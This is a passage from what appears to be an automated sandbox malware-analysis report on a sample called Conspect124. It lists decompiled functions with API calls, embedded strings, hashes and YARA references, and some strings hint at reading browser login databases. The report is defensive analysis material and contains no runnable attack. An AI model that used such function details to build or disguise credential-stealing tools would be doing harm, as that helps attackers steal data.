                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                      • String ID: AE$.cfg$General$EA
                                      • API String ID: 776488737-1622828088
                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                      Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040D8BD
                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                      • memset.MSVCRT ref: 0040D906
                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                      • String ID: sysdatetimepick32
                                      • API String ID: 1028950076-4169760276
                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                      Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                      • memset.MSVCRT ref: 0041BA3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: -journal$-wal
                                      • API String ID: 438689982-2894717839
                                      • Opcode ID: a5b3dee4d3c614e6010b14ff521a0c16f96ee56fbca2ea6827e50279be44621a
                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                      • Opcode Fuzzy Hash: a5b3dee4d3c614e6010b14ff521a0c16f96ee56fbca2ea6827e50279be44621a
                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                      Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Item$Dialog$MessageSend
                                      • String ID:
                                      • API String ID: 3975816621-0
                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                      Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 00444D09
                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                      • _wcsicmp.MSVCRT ref: 00444D33
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$wcslen$_memicmp
                                      • String ID: .save$http://$https://$log profile$signIn
                                      • API String ID: 1214746602-2708368587
                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                      Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                      • memset.MSVCRT ref: 00405E33
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                      • String ID:
                                      • API String ID: 2313361498-0
                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                      Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                      • GetTickCount.KERNEL32 ref: 0041887D
                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                      • String ID:
                                      • API String ID: 4218492932-0
                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                      Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: gj
                                      • API String ID: 438689982-4203073231
                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                      Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                      • API String ID: 3510742995-2446657581
                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                      Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                      • memset.MSVCRT ref: 00405ABB
                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                      • SetFocus.USER32(?), ref: 00405B76
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$FocusItemmemset
                                      • String ID:
                                      • API String ID: 4281309102-0
                                      • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                      • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                      Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscat
                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                      • API String ID: 384018552-4153097237
                                      • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                      • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                      Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                      • String ID: 0$6
                                      • API String ID: 2029023288-3849865405
                                      • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                      • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                      Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                      • memset.MSVCRT ref: 00405455
                                      • memset.MSVCRT ref: 0040546C
                                      • memset.MSVCRT ref: 00405483
                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$memcpy$ErrorLast
                                      • String ID: 6$\
                                      • API String ID: 404372293-1284684873
                                      • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                      • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                      Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                      • wcscpy.MSVCRT ref: 0040A0D9
                                      • wcscat.MSVCRT ref: 0040A0E6
                                      • wcscat.MSVCRT ref: 0040A0F5
                                      • wcscpy.MSVCRT ref: 0040A107
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                      • String ID:
                                      • API String ID: 1331804452-0
                                      • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                      • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                      Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: advapi32.dll
                                      • API String ID: 2012295524-4050573280
                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                      Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • <%s>, xrefs: 004100A6
                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                      • API String ID: 3473751417-2880344631
                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                      Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscat$_snwprintfmemset
                                      • String ID: %2.2X
                                      • API String ID: 2521778956-791839006
                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                      Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
